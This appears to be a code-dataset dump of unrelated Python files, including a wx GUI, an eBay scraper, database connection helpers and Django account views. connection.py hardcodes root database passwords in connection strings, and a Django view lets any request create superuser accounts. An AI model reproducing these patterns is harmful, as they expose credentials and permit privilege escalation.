wx.MessageDialog(self,\"本当に終了しますか?。保存していないデータは失われます。\",\n \"警告\",wx.YES_NO|wx.NO_DEFAULT|wx.ICON_WARNING )\n ans = md.ShowModal()\n md.Destroy()\n if ans == wx.ID_YES:\n # closeの前にportを閉じないといけない。\n robotPort.close()\n # laserPort.close()\n self.Close(True)\n\n def OnSaveAs(self,evt):\n \"ファイルを保存する。上書き保存機能はあえて付けない。\"\n # ファイルダイアログ\n svDlg = wx.FileDialog(\n self, message=\"保存するファイル名称を入力してください。\",\n defaultDir=\"\", \n defaultFile=\"untitled.txt\",\n wildcard=\"\",\n style=wx.SAVE | wx.OVERWRITE_PROMPT | wx.CHANGE_DIR\n )\n if svDlg.ShowModal() != wx.ID_OK:\n return\n path = svDlg.GetPath()\n svDlg.Destroy()\n # コメント入力ダイアログを出してから...\n res = xrc.XmlResource(resfile)\n cDlg = res.LoadDialog(self,\"commentDialog\")\n if cDlg.ShowModal() != wx.ID_OK:\n return\n tt = xrc.XRCCTRL(cDlg,\"txtArea\")\n comment = \"#\" + tt.GetValue() + \"\\r\\n\"\n cDlg.Destroy()\n\n # 確認\n #print \"path is %s\" % path\n #print \"comment is %s\" % comment \n\n # 正味の保存\n ff = file(path,\"w\")\n ff.write( comment.encode('shift_jis') )\n i = 0\n while True:\n l = []\n if i == 0:\n for j in range(4):\n l.append( self.grid.GetColLabelValue(j)) \n\n else:\n for j in range(4):\n l.append( self.grid.GetCellValue(i-1,j)) \n\n if len(l[0]) > 0 :\n #この判断のしかたは危険かも...\n ss = \"\\t\".join(l)\n ss += \"\\r\\n\"\n else:\n break\n #print ss\n ff.write(ss.encode('shift_jis'))\n i += 1\n ff.close()\n \n def OnRobotOrg(self,evt):\n # 原点復帰\n robotPort.write(\"@ORG\\r\")\n robotPort.readlines()\n\n def OnMeasure(self,evt):\n \"測定開始\"\n md = wx.MessageDialog(self,\"新しい測定を始めます。以前の測定結果は消去されますので、\\n保存していないデータは失われます。\",\n \"警告\",wx.YES_NO|wx.NO_DEFAULT|wx.ICON_WARNING )\n ans = md.ShowModal()\n md.Destroy()\n if ans == wx.ID_YES:\n dlg = MyMeasureDialog(self,self.grid)\n dlg.ShowModal() \n dlg.Destroy()\n \n def OnRobotRefPnt(self,evt = None):\n \"ロボットの基準位置設定を行う\"\n dlg = MyRobotRefPntSetDialog(self)\n ans = dlg.ShowModal()\n dlg.Destroy()\n \n######################################################################\n# MyApp\n######################################################################\nclass MyApp(wx.App):\n def OnInit(self):\n self.frame = MyFrame()\n self.frame.Show()\n self.SetTopWindow(self.frame)\n\n # show setting for robot and laser\n self.frame.OnRS232CSetting()\n for item in sys.argv:\n if item == \"-I\":\n \"ロボットの強制原点復帰\"\n self.frame.OnRobotOrg(None)\n self.frame.OnRobotRefPnt()\n \n return True\n\n# main\nif __name__ == \"__main__\":\n app = MyApp(False)\n app.MainLoop()\n\n","sub_path":"shaft_measure.py","file_name":"shaft_measure.py","file_ext":"py","file_size_in_byte":20347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"372433772","text":"'''\nCreated on Oct 25, 2010\n\n@author: suse\n\nScript for managing events\n'''\n\nimport os\nimport sys\nimport shutil\nfrom event.db_connect import db_connect\nfrom event.eid2str import eid2str\n\nclass Man(object):\n '''\n class docs\n '''\n\n def __init__(self):\n '''\n Contructor\n '''\n\n self._db = db_connect()\n\n file_dir = os.path.dirname(__file__)\n self._parent_dir = file_dir + os.sep + '..' + os.sep\n self._subscribers_dir = 'subscribers'\n self._events_dir = 'events'\n\n def process(self, argv):\n if len(argv) > 2:\n func = '_' + '_'.join(argv[1:3])\n self.__getattribute__(func)(argv[3:])\n else:\n print('Wrong number of arguments')\n\n def _add_subscriber(self, argv):\n if self._check_arg(argv, 1):\n subscriber = argv[0]\n res = self._insert_in('subscriber', {'name': subscriber})\n if res:\n path = self._parent_dir + self._subscribers_dir + os.sep + subscriber\n print('make subscr dir {0}'.format(path))\n if not os.path.exists(path):\n os.mkdir(path)\n print(os.listdir(path))\n\n def _del_subscriber(self, name):\n pass\n\n def _add_notifier(self, argv):\n if self._check_arg(argv, 1):\n subscriber = argv[0]\n self._insert_in('notifier', {'name': subscriber})\n\n def _del_notifier(self, name):\n pass\n\n def _add_transport(self, argv):\n if self._check_arg(argv, 2):\n subscriber = argv[0]\n transport = argv[1]\n res = self._insert_in('transport', {'name': transport})\n if res:\n path = self._parent_dir + self._subscribers_dir + os.sep + subscriber + os.sep + transport\n if not os.path.exists(path):\n os.mkdir(path)\n print(os.listdir(path))\n\n def _del_transport(self, subscriber, name):\n pass\n\n def _add_event(self, argv):\n if self._check_arg(argv, 3):\n subscriber = argv[0]\n transport = argv[1]\n event = argv[2]\n res = self._insert_in('event', {'name': event})\n if res:\n row = self._db.get('event', 'CreateFile', 'name')\n id_event = row['id']\n print('event id {0}'.format(id_event))\n s_event = eid2str(id_event) + '.py'\n pacDst = self._parent_dir + self._events_dir + os.sep + transport + os.sep + s_event\n pacSrc = self._parent_dir + self._subscribers_dir + os.sep + subscriber + os.sep + transport + os.sep + s_event\n print('src' + pacSrc)\n print('dst' + pacDst)\n if not os.path.exists(pacDst):\n shutil.copy(pacSrc, pacDst)\n\n\n def _del_event(self, subscriber, transport, name):\n pass\n\n def _add_dispatcher(self, argv):\n if self._check_arg(argv, 4):\n subscriber = argv[0]\n event = argv[1]\n notifier = argv[2]\n transport = argv[3]\n self._insert_in('dispatcher', {'id_subscriber': subscriber,\n 'id_notifier': notifier,\n 'id_transport': transport,\n 'id_event': event})\n\n def _insert_in(self, table, vals):\n try:\n self._db.insert(table, vals)\n print('{0} was added in {1} '.format(vals, table))\n return True\n except:\n print('Error while inserting')\n print(self._db.error)\n return False\n\n def _check_arg(self, argv, num):\n if len(argv) == num:\n return True\n print('Wrong number of arguments')\n return False\n\n#argv = ['', 'add', 'subscriber', 'user10']\n#argv = ['', 'add', 'transport', 'user10', 'mail']\nargv = sys.argv\nm = Man()\nm.process(argv)\n","sub_path":"src/scripts/man.py","file_name":"man.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"324731850","text":"for _ in range(int(input())):\n lst = []\n for _ in range(int(input())):\n lst.append(int(input()))\n ind = lst.index(max(lst))\n if lst.count(max(lst)) > 1:\n print('no winner')\n elif max(lst) > sum(lst) / 2:\n print(f'majority winner {ind + 1}')\n else:\n print(f'minority winner {ind + 1}')\n","sub_path":"Popular Vote.py","file_name":"Popular Vote.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"385262195","text":"import json\nimport os\nimport pydicom\n\nimport matplotlib.pyplot as plt\nfrom pretreatment.dicom_utils import lconvert_from_dicom_to_jpg\n\n#f = open('labels.txt', 'r', encoding='utf-8').read()\n\n#label = json.loads(f)\n\npic = pydicom.read_file('./image1.dcm')\nlconvert_from_dicom_to_jpg('./image1.dcm', './image1.jpg')\nimg = pic.pixel_array # 提取图像信息\nprint(img.shape)\nplt.imshow(img)\nplt.show()\n# print(pic)\npic.get('SOPInstanceUID')\npic.get('SeriesInstanceUID')\n\nseries_uid = label['data'][0]['seriesUid']\ninstance_uid = label['data'][0]['instanceUid']\n\nall_folder = os.listdir('./train')\nfor i in all_folder:\n files = os.listdir('./train/' + i)\n for fi in files:\n pic_info = pydicom.read_file('./train/' + i + '/' + fi)\n ins = pic_info.get('SOPInstanceUID')\n series = pic_info.get('SeriesInstanceUID')\n if ins == instance_uid and series == series_uid:\n print(i, fi)","sub_path":"pretreatment/picture_check.py","file_name":"picture_check.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"182153512","text":"from __future__ import absolute_import, unicode_literals\n\nimport psycopg2\nimport redis\nimport re\nfrom celery import Celery, Task, platforms\nfrom pymongo import MongoClient, errors\n\nimport conf\n\n\nclass ConnectionTask(Task):\n abstract = True\n\n def __init__(self):\n self._testmdb = None\n self._dmdb = None\n self._dmdb_ctrip = None\n self._smdb = None\n self._pmdb = None\n self._static = None\n self._static_cluster = None\n self._static_cluster_ctrip = None\n self._static_ctrip = None\n self._prrdb={}\n self._drdb_mast = {}\n self._drdb_paym = {}\n self._drdb_new = {}\n self._srdb_mast = {}\n self._srdb_new = {}\n self._dpprdb = {}\n self._prdb_mast = {}\n self._prdb_paym = {}\n self._prdb_activity = {}\n self._dpgdb = {}\n self._spgdb = {}\n self._ppgdb = {}\n @property\n def testmdb(self):\n if self._testmdb is None:\n _mc = MongoClient(\"mongodb://root:Boluome123@139.198.191.20:17017\")\n self._testmdb = _mc['boluome']\n return self._testmdb\n \n @property\n def dmdb(self):\n if self._dmdb is None:\n _mc = MongoClient(conf.DEV_MONGO_HOST, replicaset=conf.REPLICASET_NAME)\n self._dmdb = _mc['boluome']\n return self._dmdb\n\n @property\n def dmdb_ctrip(self):\n if self._dmdb_ctrip is None:\n _mc = MongoClient(conf.CTRIP_MONGO_HOST)\n self._dmdb_ctrip = _mc['ctrip']\n return self._dmdb_ctrip\n\n @property\n def smdb(self):\n if self._smdb is None:\n _mc = MongoClient(conf.STG_MONGO_HOST, replicaset=conf.REPLICASET_NAME)\n self._smdb = _mc['boluome']\n return self._smdb\n\n @property\n def pmdb(self):\n if self._pmdb is None:\n _mc = MongoClient(conf.PRO_MONGO_HOST, replicaset=conf.REPLICASET_NAME)\n self._pmdb = _mc['boluome']\n return self._pmdb\n\n @property\n def static(self):\n if self._static is None:\n _mc = MongoClient(conf.STATIC_MONGO_HOST, replicaset=conf.REPLICASET_NAME)\n self._static = _mc['boluome']\n return self._static\n\n @property\n def static_cluster(self):\n if self._static_cluster is None:\n _mc = MongoClient('mongodb://root:Boluome123@staticmongo-m.localdomain,staticmongo-s1.localdomain,staticmongo-s2.localdomain/?authSource=admin&readPreference=secondaryPreferred')\n self._static_cluster = _mc['boluome']\n return self._static_cluster\n \n @property\n def static_cluster_ctrip(self):\n if self._static_cluster_ctrip is None:\n _mc = MongoClient('mongodb://root:Boluome123@staticmongo-m.localdomain,staticmongo-s1.localdomain,staticmongo-s2.localdomain/?authSource=admin&readPreference=secondaryPreferred')\n self._static_cluster_ctrip = _mc['ctrip']\n return self._static_cluster_ctrip\n \n @property\n def static_ctrip(self):\n if self._static_ctrip is None:\n _mc = MongoClient(conf.STATIC_MONGO_HOST, replicaset=conf.REPLICASET_NAME)\n self._static_ctrip = _mc['ctrip']\n return self._static_ctrip\n\n def prrdb(self, db):\n if self._prrdb.get(db) is None:\n self._prrdb[db] = redis.StrictRedis(host='rrdb.localdomain',\n port='16379',\n db=db,\n encoding='utf-8',\n decode_responses=True)\n return self._prrdb[db]\n \n def drdb_mast(self, db):\n if self._drdb_mast.get(db) is None:\n self._drdb_mast[db] = redis.StrictRedis(host=conf.DEV_REDIS_MAST_HOST,\n port=conf.REDIS_PORT,\n db=db, charset=\"utf-8\",\n decode_responses=True)\n return self._drdb_mast.get(db)\n\n def drdb_paym(self, db):\n if self._drdb_paym.get(db) is None:\n self._drdb_paym[db] = redis.StrictRedis(host=conf.DEV_REDIS_PAYM_HOST,\n port=conf.REDIS_PORT,\n db=db, charset=\"utf-8\",\n decode_responses=True)\n return self._drdb_paym.get(db)\n\n def drdb_new(self, db):\n if self._drdb_new.get(db) is None:\n self._drdb_new[db] = redis.StrictRedis(host=conf.DEV_REDIS_NEW_HOST,\n port=conf.REDIS_PORT,\n db=db, charset=\"utf-8\",\n decode_responses=True)\n return self._drdb_new.get(db)\n\n def srdb_mast(self, db):\n if self._srdb_mast.get(db) is None:\n self._srdb_mast[db] = redis.StrictRedis(host=conf.STG_REDIS_MAST_HOST,\n port=conf.REDIS_PORT,\n db=db, charset=\"utf-8\",\n decode_responses=True)\n return self._srdb_mast.get(db)\n\n def srdb_new(self, db):\n if self._srdb_new.get(db) is None:\n self._srdb_new[db] = redis.StrictRedis(host=conf.STG_REDIS_NEW_HOST,\n port=conf.REDIS_PORT,\n db=db, charset=\"utf-8\",\n decode_responses=True)\n return self._srdb_new.get(db)\n \n def dpprdb(self, db):\n if self._dpprdb.get(db) is None:\n self._dpprdb[db] = redis.StrictRedis(host=\"dppredis.localdomain\",\n port=conf.REDIS_PORT,\n db=db, charset=\"utf-8\",\n decode_responses=True)\n return self._dpprdb.get(db)\n \n def prdb_mast(self, db):\n if self._prdb_mast.get(db) is None:\n self._prdb_mast[db] = redis.StrictRedis(host=conf.PRO_REDIS_MAST_HOST,\n port=conf.REDIS_PORT,\n db=db, charset=\"utf-8\",\n decode_responses=True)\n return self._prdb_mast.get(db)\n\n def prdb_paym(self, db):\n if self._prdb_paym.get(db) is None:\n self._prdb_paym[db] = redis.StrictRedis(host=conf.PRO_REDIS_PAYM_HOST,\n port=conf.REDIS_PORT,\n db=db, charset=\"utf-8\",\n decode_responses=True)\n return self._prdb_paym.get(db)\n \n def prdb_activity(self, db):\n if self._prdb_activity.get(db) is None:\n self._prdb_activity[db] = redis.StrictRedis(host=conf.PRO_REDIS_ACTIVITY_HOST,\n port=conf.REDIS_PORT,\n db=db, charset=\"utf-8\",\n decode_responses=True)\n return self._prdb_activity.get(db)\n\n def dpgdb(self, db):\n if self._dpgdb.get(db) is None:\n self._dpgdb[db] = psycopg2.connect(\"host=192.168.0.8 dbname={} user=root password=Boluome123\".format(db))\n # else:\n # self._dpgdb.rollback()\n return self._dpgdb.get(db)\n\n def spgdb(self, db):\n if self._spgdb.get(db) is None:\n self._spgdb[db] = psycopg2.connect(\"host=192.168.2.10 dbname={} user=root password=Boluome123\".format(db))\n # else:\n # self._spgdb.rollback()\n return self._spgdb.get(db)\n\n def ppgdb(self, db):\n if self._ppgdb.get(db) is None:\n self._ppgdb[db] = psycopg2.connect('host=pg.localdomain dbname={} user=root password=Boluome123'.format(db))\n # else:\n # self._ppgdb.rollback()\n return self._ppgdb.get(db)\n\n def __getitem__(self, key):\n if key in [\"dmdb\", \"dev\"]:\n return self.dmdb\n elif key in [\"test\"]:\n return self.testmdb\n elif key in [\"dmdb_ctrip\"]:\n return self.dmdb_ctrip\n elif key in [\"smdb\", \"stg\"]:\n return self.smdb\n elif key in [\"pmdb\", \"pro\"]:\n return self.pmdb\n elif key == \"static\":\n return self.static\n elif key == \"static_ctrip\":\n return self.static_ctrip\n elif key == \"static_cluster\":\n return self.static_cluster\n elif key == \"static_cluster_ctrip\":\n return self.static_cluster_ctrip\n else:\n raise KeyError\n\n\ndef mongo_upsert_operation(mdb, database, query, update, upsert=False):\n \"\"\"\n 封装mongo,update_one()操作\n mdb(Object):\n database(str):\n query(dict):\n update(dict):\n upsert(bool):\n \"\"\"\n try:\n mdb[database].update_one(query, update, upsert=upsert)\n except errors.DuplicateKeyError as why:\n mongo_upsert_operation(mdb, database, query, update, upsert)\n print(\"DuplicateKeyError fetch and retry ok\", query)\n return\n\n\ndef insert_sql_parse(sql):\n pattern = re.compile(\"\\(.+?\\)\")\n r = re.findall(pattern, sql)\n r[0] = r[0].replace('(', '')\n r[0] = r[0].replace(')', '')\n r[0] = r[0].replace(' ', '')\n keys = r[0].split(',')\n assert len(keys) == len(r[1].split(','))\n return keys\n\n\ndef pg_insert(sql, data, conn):\n \"\"\"\n 封装PostgreSql语句之 INSERT INTO\n Args:\n sql(str):\n data(list):[{},{}]\n Returns:\n out: list of tuples\n \"\"\"\n assert isinstance(sql, str)\n assert isinstance(data, list)\n assert \";\" in sql\n sql = sql.replace('?', '%s')\n keys = insert_sql_parse(sql)\n conn.commit()\n conn.rollback()\n with conn.cursor() as curs:\n sql_pg = \"\"\n for item in data:\n value = [item.get(k) for k in keys]\n sql_pg += curs.mogrify(sql, value).decode()\n curs.execute(sql_pg)\n conn.commit()\n return\n\n\ndef update_sql_parse(sql):\n sql_list = sql.split(' ')\n sql_list = [v for v in sql_list if '%s' in v]\n sql_clean = ''.join(sql_list)\n sql_clean = sql_clean.replace(';', '')\n sql_clean = sql_clean.replace('=%s', ',')\n keys = [v for v in sql_clean.split(',') if v]\n assert len(keys) > 1\n return keys\n\n\ndef pg_update(sql, data, conn):\n \"\"\"\n 封装PostgreSql语句之 UPDATE\n Args:\n sql(str):\n data(list):[{},{}]\n Returns:\n out: list of tuples\n \"\"\"\n assert isinstance(sql, str)\n assert isinstance(data, list)\n assert \";\" in sql\n sql = sql.replace('?', '%s')\n keys = update_sql_parse(sql)\n conn.commit()\n conn.rollback()\n with conn.cursor() as curs:\n sql_pg = \"\"\n for item in data:\n value = [item.get(k) for k in keys]\n sql_pg += curs.mogrify(sql, value).decode()\n curs.execute(sql_pg)\n conn.commit()\n return\n\n\ndef pg_select(sql, conn):\n \"\"\"\n 封装PostgreSql语句之 SELECT\n Args:\n sql(str):\n Returns:\n out: list of dict\n\n datas=pg_select('SELECT key FROM boluome_settlement')\n \"\"\"\n assert isinstance(sql, str)\n assert \";\" in sql\n conn.commit()\n conn.rollback()\n with conn.cursor() as curs:\n curs.execute(sql)\n keys = curs.description\n data_all = curs.fetchall()\n conn.commit()\n for item in data_all:\n yield {v[0]: item[k] for k, v in enumerate(keys)}\n\ndef get_in(coll, path=None, default=None):\n \"\"\"Returns a value at path in the given nested collection.\n Args:\n coll(object):\n path(str):'a.0.b.c'\n \"\"\"\n if path is None:\n return coll\n\n for key in path.split('.'):\n try:\n if isinstance(coll, dict):\n coll = coll[key]\n elif isinstance(coll, list):\n coll = coll[int(key)]\n else:\n raise KeyError\n except (KeyError, IndexError, TypeError, ValueError):\n return default\n return coll\n\n\ndef iteritems(coll):\n return coll.items() if hasattr(coll, 'items') else coll\n\n\ndef merge_with(*dicts):\n \"\"\"Merge several dicts.\"\"\"\n dicts = list(dicts)\n if not dicts:\n return {}\n elif len(dicts) == 1:\n return dicts[0]\n\n lists = {}\n for c in dicts:\n for k, v in iteritems(c):\n lists[k] = v\n\n return lists\n","sub_path":"master/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":12760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"545057074","text":"# Input: games pandas\n# Output: standing pandas\ndef make_standing(games):\n import numpy as np\n import pandas as pd\n \n seasons = sorted(list(set(games[\"Season\"])))\n \n # Output is standing pandas\n standing = dict()\n standing[\"Team\"] = []\n standing[\"Season\"] = []\n standing[\"Competition\"] = []\n standing[\"W\"] = []\n standing[\"L\"] = []\n standing[\"T\"] = []\n standing[\"GP\"] = []\n standing[\"GF\"] = []\n standing[\"GA\"] = []\n standing[\"GD\"] = []\n standing[\"R\"] = []\n standing[\"PTS\"] = []\n \n for season in seasons:\n # Games in this season\n games_season = games[games.Season == season]\n \n # Teams\n teams = sorted(list(set(games_season[\"HomeTeam\"])))\n number_of_teams = len(teams)\n \n # Add teams to standing\n for team in teams:\n standing[\"Team\"].append(team)\n standing[\"Season\"].append(season)\n standing[\"Competition\"].append(games_season.Competition.iloc[0])\n standing[\"W\"].append(0)\n standing[\"L\"].append(0)\n standing[\"T\"].append(0)\n standing[\"GP\"].append(0)\n standing[\"GF\"].append(0)\n standing[\"GA\"].append(0)\n standing[\"GD\"].append(0)\n standing[\"R\"].append(0)\n standing[\"PTS\"].append(0) \n \n # Calculate standing\n for i in range(len(games_season)):\n # Check if game already played\n if np.isnan(games_season.iloc[i][\"FTHG\"]):\n continue\n \n ht_game = games_season.iloc[i][\"HomeTeam\"]\n at_game = games_season.iloc[i][\"AwayTeam\"]\n fthg_game = games_season.iloc[i][\"FTHG\"]\n ftag_game = games_season.iloc[i][\"FTAG\"]\n for j in range(len(standing[\"Team\"])):\n # HomeTeam\n if standing[\"Team\"][j] == ht_game and standing[\"Season\"][j] == season:\n # Add GP\n standing[\"GP\"][j] += 1\n \n # Add W-T-L and PTS\n if fthg_game > ftag_game:\n standing[\"W\"][j] += 1\n standing[\"PTS\"][j] += 3\n elif fthg_game == ftag_game:\n standing[\"T\"][j] += 1 \n standing[\"PTS\"][j] += 1\n else:\n standing[\"L\"][j] += 1\n standing[\"PTS\"][j] += 0\n \n # Add Goals\n standing[\"GF\"][j] += fthg_game\n standing[\"GA\"][j] += ftag_game\n standing[\"GD\"][j] += fthg_game-ftag_game\n \n # AwayTeam\n if standing[\"Team\"][j] == at_game and standing[\"Season\"][j] == season:\n # Add GP\n standing[\"GP\"][j] += 1\n \n # Add W-T-L and PTS\n if ftag_game > fthg_game:\n standing[\"W\"][j] += 1\n standing[\"PTS\"][j] += 3\n elif ftag_game == fthg_game:\n standing[\"T\"][j] += 1 \n standing[\"PTS\"][j] += 1\n else:\n standing[\"L\"][j] += 1\n standing[\"PTS\"][j] += 0\n \n # Add Goals\n standing[\"GF\"][j] += ftag_game\n standing[\"GA\"][j] += fthg_game\n standing[\"GD\"][j] += ftag_game-fthg_game \n # Convert to Pandas\n standing = pd.DataFrame(standing)\n \n return standing\n\n# Rank standing pandas based on ranking rules of country\ndef rank(standing, country_data):\n import numpy as np\n import pandas as pd\n \n seasons = sorted(list(set(standing[\"Season\"])))\n ranking_rules = country_data[\"ranking\"]\n \n for season in seasons:\n # Rank\n standing_season = standing[standing.Season == season].sort_values(ranking_rules,ascending=[0,0,0])\n \n # Add ranking number (1-number_of_teams) \n for i in range(len(standing_season)):\n standing.loc[standing_season.index[i],\"R\"] = i + 1\n \n \n return standing","sub_path":"app_betting/code/functions/game_to_team.py","file_name":"game_to_team.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"591926914","text":"# Make an particles.in file\n\nimport numpy as np\n\n# End points of line in grid coordinates\nx0, x1 = 63.55, 123.45\ny0, y1 = 90.0, 90\n\n# Number of particles along the line\nNpart = 1000\n\n# Fixed particle depth\nZ = 5\n\nX = np.linspace(x0, x1, Npart)\nY = np.linspace(y0, y1, Npart)\n\nf = open(\"outline.rls\", mode=\"w\")\n\nfor i, (x, y) in enumerate(zip(X, Y)):\n f.write(\"1989-05-24T12 {:7.3f} {:7.3f} {:6.1f}\\n\".format(x, y, Z))\n\nf.close()\n","sub_path":"examples/outline/make_release.py","file_name":"make_release.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"3642310","text":"import scrapy\n\n\nclass WatchesSpider(scrapy.Spider):\n name = 'watches'\n start_urls = ['https://www.ebay.com/sch/i.html?_from=R40&_oac=1&_prodsch=1&_dmd=1&LH_BIN=1&_ipg=200&_nkw=watches&_dcat=31387&rt=nc&_mPrRngCbx=1&_udlo=400&_udhi']\n # start_urls = ['https://www.ebay.com/sch/i.html?_from=R40&_oac=1&_prodsch=1&_dmd=1&LH_BIN=1&_mPrRngCbx=1&_udlo=400&_udhi=&_nkw=watches&_ipg=25&rt=nc']\n def parse(self, response):\n # follow pagination links\n for href in response.xpath('//a[@class=\"gspr next\"]/@href'):\n yield response.follow(href, self.parse)\n\n # follow links to wathes pages\n for href in response.css('h3.lvtitle a::attr(href)'):\n yield response.follow(href, self.parse_watches)\n\n def parse_watches(self, response):\n id_pos = response.url.find('?')\n id = response.url[id_pos+5:id_pos+17]\n img_url = False\n for url in response.xpath('//*[@class=\"app-filmstrip__image cc-image\"]/@src').extract():\n img_name_pos = url.find('s-l')\n if img_name_pos != -1:\n img_url = url\n break\n if not img_url:\n for url in response.xpath('//img[contains(@class,\"vi-image-gallery__image\")]/@src').extract():\n img_name_pos = url.find('s-l')\n if img_name_pos != -1:\n img_url = url\n break\n if img_url:\n img_url = img_url[:img_name_pos+2]+\"l1600.jpg\"\n else:\n img_url = response.xpath('//img[contains(@class,\"vi-image-gallery__image vi-image-gallery__image--absolute-center\")]/@src').extract_first()\n yield {\n 'id': id,\n 'item_url': response.url, \n 'price': response.xpath('//h2[@class=\"display-price\"]//text()').extract_first(),\n 'image_urls': [img_url],\n 'name': response.css('h1.product-title::text').extract_first().strip(),\n }","sub_path":"ebay/spiders/watches_spider.py","file_name":"watches_spider.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"323838097","text":"documents = [\n {\"type\": \"passport\", \"number\": \"2207 876234\", \"name\": \"Василий Гупкин\"},\n {\"type\": \"invoice\", \"number\": \"11-2\", \"name\": \"Геннадий Покемонов\"},\n {\"type\": \"insurance\", \"number\": \"10006\", \"name\": \"Аристарх Павлов\"}\n]\n\ndirectories = {\n '1': ['2207 876234', '11-2'],\n '2': ['10006'],\n '3': []\n}\n\n\n# p – people – команда, которая спросит номер документа и выведет имя человека, которому он принадлежит;\n\ndef get_document_owner(people):\n user_input = input('Введите номер документа: ')\n name = 0\n for person in people:\n if user_input == person['number']:\n name += 1\n print(person['name'])\n if name == 0:\n print('Документ не найден')\n\n\n# get_document_owner(documents)\n\n\n# l– list – команда, которая выведет список всех документов в формате passport \"2207 876234\" \"Василий Гупкин\";\n\ndef get_documents_info(people):\n info = []\n for person in people:\n person_info = []\n person_info.append(person[\"type\"])\n person_info.append(person[\"number\"])\n person_info.append(person[\"name\"])\n info.append(person_info)\n return info\n\n\n# get_documents_info(documents)\n\n\n# s – shelf – команда, которая спросит номер документа и выведет номер полки, на которой он находится;\n\ndef get_shelf_number_by_document_number(shelves):\n shelf = 0\n user_input = input('Введите номер документа: ')\n for shelf_num, document in shelves.items():\n if user_input in document:\n shelf += 1\n print(shelf_num)\n if shelf == 0:\n print('Документ не найден ни на одной из полок')\n\n\n# get_shelf_number_by_document_number(directories)\n\n\n# a – add – команда, которая добавит новый документ в каталог и в перечень полок, спросив его номер, тип, имя владельца\n# и номер полки, на котором он будет храниться.\n\ndef add_document_and_shelf():\n doc_num = input('Введите номер документа: ')\n doc_type = input('Введите тип документа: ')\n owners_name = input('Введите имя владельца документа: ')\n shelf_num = input('Введите номер полки: ')\n documents.append({\"type\": doc_type, \"number\": doc_num, \"name\": owners_name})\n if shelf_num in directories.keys():\n directories[shelf_num].append(doc_num)\n else:\n directories[shelf_num] = list()\n directories[shelf_num].append(doc_num)\n print(documents)\n print()\n print(directories)\n\n\n\n\ndef main():\n user_input = input('Введите команду: ')\n if user_input == 'p':\n get_document_owner(documents)\n elif user_input == 'l':\n get_documents_info(documents)\n elif user_input == 's':\n get_shelf_number_by_document_number(directories)\n elif user_input == 'a':\n add_document_and_shelf()\n else:\n print('Несуществующая команда')\n\n\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"181027638","text":"from django.contrib.auth import authenticate\nfrom rest_framework.views import APIView\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom .serializers import UserSerializer, CredentialSerializer\nfrom django.contrib.auth.models import User\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework import status\nfrom django.db import transaction\n\n\nclass CreateUserView(APIView):\n def post(self, request):\n serializer = UserSerializer(data=request.data)\n\n if not serializer.is_valid():\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n with transaction.atomic():\n user = User.objects.create_user(\n username=request.data[\"username\"],\n password=request.data[\"password\"],\n is_superuser=request.data[\"is_superuser\"],\n is_staff=request.data[\"is_staff\"],\n )\n serializer = UserSerializer(user)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n except:\n return Response(\n {\"error\": \"User already exists\"}, status=status.HTTP_409_CONFLICT\n )\n\n\nclass LoginView(APIView):\n def post(self, request):\n serializer = CredentialSerializer(data=request.data)\n\n if not serializer.is_valid():\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n user = authenticate(\n username=request.data[\"username\"], password=request.data[\"password\"]\n )\n\n if user:\n token = Token.objects.get_or_create(user=user)[0]\n return Response({\"token\": token.key})\n else:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"301200203","text":"# -*- coding: utf-8 -*-\n\n# Copyright (c) 2016, 2017, Oracle and/or its affiliates. All rights reserved.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License, version 2.0, as\n# published by the Free Software Foundation.\n#\n# This program is also distributed with certain software (including\n# but not limited to OpenSSL) that is licensed under separate terms,\n# as designated in a particular file or component or in included license\n# documentation. The authors of MySQL hereby grant you an\n# additional permission to link the program and your derivative works\n# with the separately licensed software that they have included with\n# MySQL.\n#\n# Without limiting anything contained in the foregoing, this file,\n# which is part of MySQL Connector/Python, is also subject to the\n# Universal FOSS Exception, version 1.0, a copy of which can be found at\n# http://oss.oracle.com/licenses/universal-foss-exception.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n# See the GNU General Public License, version 2.0, for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\"\"\" BUG21879914 Fix using C/Extension with only CA given\n\"\"\"\n\nimport os.path\nimport unittest\n\nimport mysql.connector\nfrom tests import foreach_cnx, cnx_config\nimport tests\n\ntry:\n from mysql.connector.connection_cext import CMySQLConnection\nexcept ImportError:\n # Test without C Extension\n CMySQLConnection = None\n\nTEST_SSL = {\n 'ca': os.path.join(tests.SSL_DIR, 'tests_CA_cert.pem'),\n 'cert': 